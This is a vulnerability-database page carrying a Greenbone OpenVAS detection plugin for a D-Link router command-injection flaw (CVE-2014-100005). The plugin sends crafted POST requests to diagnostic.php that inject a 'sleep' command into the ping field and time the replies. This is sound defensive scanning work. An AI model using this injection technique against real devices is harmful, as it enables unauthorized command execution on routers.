D-Link Devices Multiple Vulnerabilities (Apr 2013) - Active Check
🗓️ 09 Apr 2013 00:00:00Reported by Copyright (C) 2013 Greenbone AGType
openvas🔗 plugins.openvas.org👁 30 Views
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2014-100005 | 13 Jan 201500:00 | – | attackerkb | |
| The vulnerability of D-Link DIR-600 router’s microprogramming software, related to the manipulation of inter-site requests, allows a hacker to increase their privileges. | 21 May 202400:00 | – | bdu_fstec | |
| CVE-2014-100005 | 29 May 201815:50 | – | circl | |
| D-Link DIR-600 Router Cross-Site Request Forgery (CSRF) Vulnerability | 16 May 202400:00 | – | cisa_kev | |
| CISA Adds Three Known Exploited Vulnerabilities to Catalog | 16 May 202412:00 | – | cisa | |
| CVE-2014-100005 | 13 Jan 201511:00 | – | cve | |
| CVE-2014-100005 | 13 Jan 201511:00 | – | cvelist | |
| DLink DIR < 2.17.b02 (SAP10018) | 23 May 202400:00 | – | nessus | |
| D-Link DIR-645 / DIR-815 diagnostic.php Command Execution | 5 Mar 201300:00 | – | metasploit | |
| CVE-2014-100005 | 13 Jan 201511:59 | – | nvd |
10
| Source | Link |
|---|---|
| s3cur1ty | www.s3cur1ty.de/m1adv2013-017 |
| securityfocus | www.securityfocus.com/bid/58938 |
| cisa | www.cisa.gov/known-exploited-vulnerabilities-catalog |
# SPDX-FileCopyrightText: 2013 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.103691");
script_version("2026-04-23T06:21:05+0000");
script_tag(name:"last_modification", value:"2026-04-23 06:21:05 +0000 (Thu, 23 Apr 2026)");
script_tag(name:"creation_date", value:"2013-04-09 12:07:13 +0200 (Tue, 09 Apr 2013)");
script_tag(name:"cvss_base", value:"6.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:P/A:P");
script_tag(name:"severity_vector", value:"CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2026-04-22 13:57:50 +0000 (Wed, 22 Apr 2026)");
script_xref(name:"CISA", value:"Known Exploited Vulnerability (KEV) catalog");
script_xref(name:"URL", value:"https://www.cisa.gov/known-exploited-vulnerabilities-catalog");
script_cve_id("CVE-2014-100005");
script_tag(name:"qod_type", value:"remote_analysis");
script_tag(name:"solution_type", value:"VendorFix");
script_name("D-Link Devices Multiple Vulnerabilities (Apr 2013) - Active Check");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2013 Greenbone AG");
script_family("Web application abuses");
# nb: Experiences in the past have shown that various different devices could be affected
script_dependencies("gb_dlink_dsl_consolidation.nasl", "gb_dlink_dap_consolidation.nasl",
"gb_dlink_dir_consolidation.nasl", "gb_dlink_dwr_consolidation.nasl");
script_mandatory_keys("d-link/http/detected");
script_require_ports("Services/www", 80, 8080);
script_tag(name:"summary", value:"D-Link devices are prone to multiple vulnerabilities.");
script_tag(name:"vuldetect", value:"Sends multiple crafted HTTP POST requests and checks the
responses.");
script_tag(name:"impact", value:"Exploiting these issues could allow an attacker to gain access to
potentially sensitive information and execute arbitrary commands in the context of the affected
device.");
script_tag(name:"affected", value:"DIR-600 / DIR-300 revB / DIR-815 / DIR-645 / DIR-412 / DIR-456 /
DIR-110.
Other devices and models might be affected as well.");
script_tag(name:"solution", value:"The vendor has released updates. Please see the references for
more information.");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/58938");
script_xref(name:"URL", value:"http://www.s3cur1ty.de/m1adv2013-017");
exit(0);
}
CPE_PREFIX = "cpe:/o:dlink";
include("host_details.inc");
include("http_func.inc");
if(!infos = get_app_port_from_cpe_prefix(cpe:CPE_PREFIX, service:"www"))
exit(0);
port = infos["port"];
CPE = infos["cpe"];
if(!dir = get_app_location(cpe:CPE, port:port))
exit(0);
if(dir == "/")
dir = "";
useragent = http_get_user_agent();
host = http_host_name(port:port);
count = 0;
url = dir + "/diagnostic.php";
foreach sleep (make_list(3, 5, 10)){
ex = 'act=ping&dst=%3b%20sleep ' + sleep + '%3b';
len = strlen(ex);
req = string("POST ", url, " HTTP/1.1\r\n",
"Host: ", host, "\r\n",
"User-Agent: ", useragent, "\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n",
"Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\n",
"Accept-Encoding: identity\r\n",
"Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n",
"Referer: http://", host, "/\r\n",
"Content-Length: ", len, "\r\n",
"Cookie: uid=hfaiGzkB4z\r\n",
"\r\n",
ex);
start = unixtime();
result = http_send_recv(port:port, data:req);
stop = unixtime();
if(stop - start < sleep || stop - start > (sleep + 5))
continue;
else
count++;
}
if(count > 1) {
report = http_report_vuln_url(port:port, url:url);
security_message(port:port, data:report);
exit(0);
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Apr 2026 00:00Current
7.5High risk
Vulners AI Score7.5
CVSS 26.8
CVSS 3.18
EPSS0.42414
SSVC